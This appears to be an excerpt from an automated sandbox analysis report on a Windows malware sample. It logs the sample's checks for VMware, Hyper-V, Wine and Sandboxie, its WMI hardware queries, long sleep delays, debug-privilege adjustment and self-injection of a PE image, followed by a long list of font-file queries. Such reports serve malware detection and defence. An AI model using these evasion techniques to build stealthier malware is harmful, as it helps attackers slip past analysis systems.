                Source: rzN2ckYW24.exe, 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: rzN2ckYW24.exe, 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 2336Thread sleep time: -42186s >= -30000s
                Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5096Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5852Thread sleep count: 32 > 30
                Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5852Thread sleep time: -29514790517935264s >= -30000s
                Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5092Thread sleep count: 9836 > 30
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWindow / User API: threadDelayed 9836
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeThread delayed: delay time: 42186
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeThread delayed: delay time: 922337203685477
                Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: rzN2ckYW24.exe, 00000002.00000003.326404699.0000000000C17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
                Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeMemory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeMemory written: C:\Users\user\Desktop\rzN2ckYW24.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeProcess created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Users\user\Desktop\rzN2ckYW24.exe VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\rzN2ckYW24.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
